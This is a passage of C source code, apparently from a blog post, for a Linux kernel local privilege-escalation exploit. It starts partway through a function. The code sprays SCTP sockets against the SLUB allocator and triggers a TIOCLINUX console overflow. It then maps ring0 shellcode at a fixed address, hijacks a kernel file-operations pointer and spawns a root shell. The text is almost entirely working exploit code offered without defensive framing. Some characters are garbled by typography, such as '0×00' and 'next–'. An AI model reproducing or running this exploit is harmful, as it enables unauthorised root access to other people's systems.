if(ret < 0)
return -1;

len = sizeof(struct sockaddr_in);
while((ret = accept(fd, (struct sockaddr *)&tmp, &len)) >= 0)
{
    if(dorec != 0 && c >= dorec && idx < 10)
    {
      g_array[idx] = ret;
      if(idx==9)
      {
        fd_zmap_srv = ret;
        caddr = tmp;
        break;
      }
      idx++;
    }
    c++;
    write_sctp(ret, &tmp, zstream);
}
sleep(1);
return 0;
}

static int do_mmap(unsigned long base, int npages)
{
void*addr = mmap((void*)base, PAGE_SIZE*npages,
PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);

if(MAP_FAILED == addr)
return -1;

memset(addr, 0×00, PAGE_SIZE*npages);
return 0;
}

pid_t start_listener()
{
pid_t pid;
pid = clone(clone_thread, cstack+STACK_SIZE-8,
CLONE_VM|CLONE_FILES|SIGCHLD, NULL);
return pid;
}

static void do_socks(struct sockaddr_in *s, __u16 stream)
{
int i,fd;
int n_objs = get_total_object(kmalloc_fd), tmp_n_objs;
int next=8;

for(i=0; next != 0; i++)
{
fd = create_and_init();

    tmp_n_objs = get_total_object(kmalloc_fd);
    if(!dorec && tmp_n_objs != n_objs)
      dorec=i;

    conn_and_write(fd, s, stream);
    if(dorec)
      next–;
}
}

static void clr(int fd)
{
/* use termcap instead..*/
write(fd, "\33[H\33[J", 6);
}

static char tiobuffer[2048];
void alloc_tioclinux()
{
int i;
char out[128*3];
/* Unicode Character ‘BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL’ (U+253C) */
char utf8[3] = { 0xE2, 0×94, 0xBC };
//char utf8[3] = { 0xE2, 0×80, 0xBC };
struct tiocl_selection *sel;
char *t;
void *v = malloc(sizeof(struct tiocl_selection) + 1);
t = (char*)v;
sel = (struct tiocl_selection *)(t+1);
memset(out, 0×41, sizeof(out));
for(i=0; i<128; i++)
{
    tiobuffer[(i*3)]=utf8[0];
    tiobuffer[(i*3)+1]=utf8[1];
    tiobuffer[(i*3)+2]=utf8[2];
}

*t = TIOCL_SETSEL;
sel->xs = 1;
sel->ys = 1;
sel->xe = 43;
//sel->xe = 42; /* no overflow */
sel->ye = 1;
write(1, tiobuffer, sizeof(tiobuffer));
if(ioctl(1, TIOCLINUX, v) < 0)
__fatal("[!!] Unable to call TIOCLINUX ioctl(), need stdout to be on a virtual console\n");
}

static void migrate_evil_fd()
{
int i;
pid_t child;

__msg("[**] Migrate evil unsafe fds to child process..\n");
child = fork();
if(!child)
{

    /* preserve evil fds */
    setsid();
    if(!cankill) /* cant die .. */
      while(1)
        sleep(1);
    else
    {
      sleep(10); /* wait execve() before */
      for(i=0; i<4; i++)
        close(unsafe_fd[i]);

      exit(1);
    }
}
else
{
    if(!cankill)
      __msg_f("[**] Child process %d _MUST_ NOT die … keep it alive:)\n", child);
}
}

static void trigger_fault()
{
char *argv[]={"/bin/sh", NULL};
int fd,i;

fd = open("/proc/timer_list", O_RDONLY);
if(fd >= 0)
{
    ioctl(fd, 0, 0);
    __free_stuff();
    migrate_evil_fd();
    for(i=0; i<4; i++)
      close(unsafe_fd[i]);

    if(!getuid())
    {
      __msg("[**] Got root!\n");
      execve("/bin/sh", argv, NULL);
    }
}
else
{
    __msg("[**] Cannot open /proc/timer_list");
    __free_stuff();
}
}

static void overwrite_fops( int sender,
                            struct sockaddr_in *to_receiver,
                            int receiver)
{
char *p = NULL;
if(!highpage)
    p++;
else
    p = (void*)STRUCT_PAGE_ALT;

__u64 *uip = (__u64*)p;
*uip = fops;
write_sctp(sender, to_receiver, 1);
sleep(1);
trigger_fault();
}

static __u16 get_port()
{
__u16 r = (__u16)getpid();
if(r <= 0×400)
r+=0×400;
return r;
}

int main(int argc, char *argv[])
{
int peerx, peery,i;
__u64 *patch;

srvport = get_port();

uid=getuid();
gid=getgid();
fops=get_fops_addr() + 64;
if(!fops)
{
__msg("[!!] Unable to locate symbols…\n");
return 1;
}

__msg_f("[**] Patching ring0 shellcode with userspace addr: %p\n", ring0c);
patch = (__u64*)(ring0 + CJUMP_OFF);
*patch = (__u64)ring0c;

__msg_f("[**] Using port: %d\n", srvport);
__msg("[**] Getting slab info…\n");
kmalloc_fd = get_kmalloc_fd();
if(!get_total_object(kmalloc_fd))
__fatal("[!!] Only SLUB allocator supported\n");

__msg("[**] Mapping Segments…\n");
__msg("[**] Trying mapping safe page…");
if(do_mmap(STRUCT_PAGE, 1) < 0)
{
    __msg("Page Protection Present (Unable to Map Safe Page)\n");
    __msg("[**] Mapping High Address Page (dont kill placeholder child)\n");
    if(do_mmap(STRUCT_PAGE_ALT, 1) < 0)
      __fatal_errno("mmap");

    cankill=0; /* dont kill child owning unsafe fds.. */
    highpage=1; /* ssnmap in higher pages */
    zstream=STREAM_ZERO_ALT;
}
else
    __msg("Done\n");

__msg("[**] Mapping Code Page… ");
if(do_mmap(CODE_PAGE, 1) < 0)
__fatal_errno("mmap");
else
__msg("Done\n");

memcpy((void*)CODE_PAGE, ring0, sizeof(ring0));

__msg("[**] Binding on CPU 0\n");
bindcpu();

__msg("[**] Start Server Thread..\n");
child = start_listener();
sleep(3);
do_socks(&server_s, zstream);
for(i=0; i<7; i++)
{
close(g_array[8-1-i]);
}
clr(1);
alloc_tioclinux(); // trigger overflow
peerx = create_and_init();
connect_peer(peerx, &server_s);
peery = create_and_init();
connect_peer(peery, &server_s);
sleep(1);

unsafe_fd[0] = peerx;
unsafe_fd[1] = g_array[8];
unsafe_fd[2] = peery;
unsafe_fd[3] = g_array[9];
__msg("\n");
__msg_f("[**] Umapped end-to-end fd: %d\n", fd_zmap_srv);
__msg_f("[**] Unsafe fd: ( ");

for(i=0; i<4; i++)
__msg_f("%d ", unsafe_fd[i]);
__msg(")\n");

__msg("[**] Hijacking fops…\n");
overwrite_fops(fd_zmap_srv, &caddr, peery);

/* if u get here.. something nasty happens…may crash..*/
__free_stuff();
__msg("[**] Exploit failed.. freezing process\n");
kill(getpid(), SIGSTOP);
return 0;
}

#endif

Tagged with: kernel • linux • local exploit

Previous Entries Next Entries